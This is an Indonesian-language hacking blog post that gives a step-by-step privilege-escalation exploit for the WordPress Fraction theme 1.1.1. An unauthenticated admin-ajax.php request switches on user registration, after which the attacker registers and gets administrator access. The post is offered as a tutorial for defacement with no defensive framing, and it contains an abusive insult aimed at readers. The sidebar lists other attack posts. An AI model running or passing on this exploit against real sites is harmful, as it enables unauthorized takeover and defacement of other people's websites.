• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

WordPress Fraction Theme Version 1.1.1 Privilege Escalation

March 11, 2015 by Jack Wilder Leave a Comment

Exploit nya masih anget kak :p . Baru kemaren dirilis di 1337day. Oke langsung saja ya alat dan bahat nya :3
Google Dorks :
USE YOUR BRAIN, BITCH !!

Vulnerability : /fraction-theme/functions/ajax.php

How to Exploit :
localhost/wordpress/wp-admin/admin-ajax.php?action=ot_save_options&users_can_register=1
Jika fitur register sebelumnya dilarang, dengan command ini maka fitur register akan dibuka secara ilegal.

Habis itu, buka localhost/wordpress/wp-login.php?action=register

Cek email, masukin user dan password, logged to dashboard as Admin 🙂

Sekian tutor kali ini semoga bermanfaat.

Shares

Filed Under: WordPress Exploit Tagged With: Deface, Exploit, Hacking

Reader Interactions

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

WordPress Fraction Theme Version 1.1.1 Privilege Escalation

Mass Deface setelah Rooting Server

RCE pada Redis via Master-Slave Replication

Woocommerce Custom Tshirt Desginer CSRF Shell Upload Vulnerability

GitHub Custom Domain or Subdomain Takeover

MyBB 1.8.x SQL Injection Auto Exploit

Cracking FTP Password using Hydra on BackBox Linux

DNS Hijacking through Social Engineering

Cara Mendapatkan RDP Gratis Dengan Shell Windows

Uptimerobot.com Custom Domain or Subdomain Takeover

LinuxSec / 68 queries in 0.10 seconds